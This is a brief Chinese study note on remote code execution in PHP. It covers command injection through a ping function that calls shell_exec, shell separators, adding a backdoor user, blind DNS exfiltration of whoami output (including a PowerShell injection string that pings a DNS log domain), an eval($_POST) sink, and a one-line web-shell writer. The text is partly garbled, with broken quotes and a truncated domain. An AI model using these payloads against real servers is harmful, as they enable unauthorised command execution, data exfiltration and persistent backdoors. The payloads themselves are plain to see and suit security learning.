RCE 学习

ping类型,执行系统命令

1	$result.=shell_exec('ping '.$ip)

echo可以执行系统命令
无回显页面
useradd xiaodisec
passwd xiaodisec 需要输入密码（无回显很难设置）

linux特有命令执行会先执行里面的内容

`| ` 把前一个命令输入到后一个
`&` 后台任务符号
`:` linux特有
`||` 逻辑或

` `` `执行可以用在dns外带中
在ping中执行以下语句就可以看到回显

whoami.dns…com





然而windows下不支持；和` `` `，于是使用powershell支持定义变量和有对于字符的.replace()函数可以替换/，echo 命令可以直接执行，从而实现外带

powershell支持；,需要注意的是注意这个replace玩不会改变原来变量的内容，需要自己来赋值

127.0.0.1 | powershell $x=whoami;$x=$x.Replace(‘',’xxx’);$y=’dns.log’;$z=$x+$y;ping $z




## `eval()`命令执行

eval($_POST[‘txt’]


`POST`传入的`txt`内容马上会被执行

exp

fputs(fopen(‘shell.php’,’w’),’‘);